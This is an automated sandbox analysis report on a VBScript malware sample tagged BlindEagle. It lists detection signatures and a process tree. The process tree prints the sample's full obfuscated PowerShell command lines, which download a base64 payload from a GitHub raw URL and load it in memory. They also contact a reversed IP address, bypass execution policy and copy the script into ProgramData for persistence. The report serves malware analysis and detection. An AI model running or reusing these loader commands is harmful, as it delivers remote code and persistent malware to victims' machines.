Edit tour
Windows
Analysis Report
WW8kzvnphl.vbs
Overview
General Information
Sample name: | WW8kzvnphl.vbsrenamed because original name is a hash value |
Original sample name: | 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs |
Analysis ID: | 1523826 |
MD5: | adadc5d47f87dd519f9a7da9ba03daf5 |
SHA1: | 3de39ed4ff76305d9dc87b484bf2b78d7f332dbf |
SHA256: | 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Command shell drops VBS files
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7412 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\WW8kz vnphl.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7464 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnUjFsJy sndXJsID0g JysnUUxlJy snaHR0cCcr J3M6Ly8nKy dyYScrJ3cn KycuZ2l0aC crJ3UnKydi dXNlcmNvbn RlbnQnKycu Y28nKydtL0 5vRGV0ZWN0 T24vTm9EZX QnKydlJysn YycrJ3RPbi 9yJysnZWZz L2hlYWRzLy crJ20nKydh aW4vRGV0YW hOb3RoLScr J1YudHgnKy d0UUxlOyBS MWxiYXNlNj RDbycrJ24n Kyd0ZW50ID 0gKE5ldy1P YmonKydlY3 QgU3lzdGUn KydtLk5lJy sndCcrJy4n KydXZScrJ2 JDJysnbGkn KydlbnQpLk RvdycrJ25s b2FkJysnU3 RyaW4nKydn JysnKFInKy cxbHVyJysn bCk7JysnIF IxbGJpbicr J2FyeScrJ0 MnKydvbnRl bnQnKycgJy snPSBbU3lz dCcrJ2VtLi crJ0NvbnZl cnRdOjpGci crJ29tQicr J2FzZTY0U3 RyJysnaW4n KydnKFIxbG Jhc2U2NCcr J0NvbnQnKy dlbicrJ3Qp JysnOyBSJy snMWwnKydh c3MnKydlbW InKydseSA9 IFtSZWYnKy dsJysnZWN0 aW9uLkEnKy dzJysnc2Un KydtYmx5XT o6TCcrJ29h ZCgnKydSMW xiaW5hJysn cnlDb250Jy snZW50KTsg JysnWycrJ2 RubGliJysn LklPJysnLk gnKydvbWVd JysnOjonKy dWQUkoZHpr dHh0LicrJ0 dGQ1JSLzAn Kyc1NC8zJy snNS4zNC4n Kyc1LjInKy c3Ly86cHR0 aCcrJ2R6ay crJywgZHpr JysnMWR6ay crJywgJysn ZHprJysnQz prJysnc2gn KydQcm9nci crJ2FtRGF0 YWtzaGR6ay wgZHprYXV0 b3AnKydhdG lhZCcrJ3pr LCcrJyBkem snKydSZWcn KydBc21kei crJ2ssIGQn Kyd6a2QnKy d6aycrJyxk JysnemtkJy snemspJykt UkVQTEFDZS AgKFtjaEFy XTEwMCtbY2 hBcl0xMjIr W2NoQXJdMT A3KSxbY2hB cl0zNCAtUk VQTEFDZSAn a3NoJyxbY2 hBcl05Mi1D UkVwbEFDZS AgKFtjaEFy XTgyK1tjaE FyXTQ5K1tj aEFyXTEwOC ksW2NoQXJd MzYgLVJFUE xBQ2UnUUxl JyxbY2hBcl 0zOSl8ICYo IChbc3RySU 5nXSR2ZXJC T1NlUHJlZk VSRW5jZSlb MSwzXSsneC ctak9Jbicn KQ==';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7628 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('R1 l'+'url = '+'QLe'+'h ttp'+'s:// '+'ra'+'w' +'.gith'+' u'+'buserc ontent'+'. co'+'m/NoD etectOn/No Det'+'e'+' c'+'tOn/r' +'efs/head s/'+'m'+'a in/DetahNo th-'+'V.tx '+'tQLe; R 1lbase64Co '+'n'+'ten t = (New-O bj'+'ect S yste'+'m.N e'+'t'+'.' +'We'+'bC' +'li'+'ent ).Dow'+'nl oad'+'Stri n'+'g'+'(R '+'1lur'+' l);'+' R1l bin'+'ary' +'C'+'onte nt'+' '+'= [Syst'+'e m.'+'Conve rt]::Fr'+' omB'+'ase6 4Str'+'in' +'g(R1lbas e64'+'Cont '+'en'+'t) '+'; R'+'1 l'+'ass'+' emb'+'ly = [Ref'+'l' +'ection.A '+'s'+'se' +'mbly]::L '+'oad('+' R1lbina'+' ryCont'+'e nt); '+'[' +'dnlib'+' .IO'+'.H'+ 'ome]'+':: '+'VAI(dzk txt.'+'GFC RR/0'+'54/ 3'+'5.34.' +'5.2'+'7/ /:ptth'+'d zk'+', dzk '+'1dzk'+' , '+'dzk'+ 'C:k'+'sh' +'Progr'+' amDatakshd zk, dzkaut op'+'atiad '+'zk,'+' dzk'+'Reg' +'Asmdz'+' k, d'+'zkd '+'zk'+',d '+'zkd'+'z k)')-REPLA Ce ([chAr] 100+[chAr] 122+[chAr] 107),[chAr ]34 -REPLA Ce 'ksh',[ chAr]92-CR EplACe ([c hAr]82+[ch Ar]49+[chA r]108),[ch Ar]36 -REP LACe'QLe', [chAr]39)| &( ([strI Ng]$verBOS ePrefEREnc e)[1,3]+'x '-jOIn'')" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7740 cmdline:
"C:\Window s\System32 \cmd.exe" /C copy *. vbs "C:\Pr ogramData\ autopatia. vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7972 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ autopatia. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 8164 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ autopatia. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |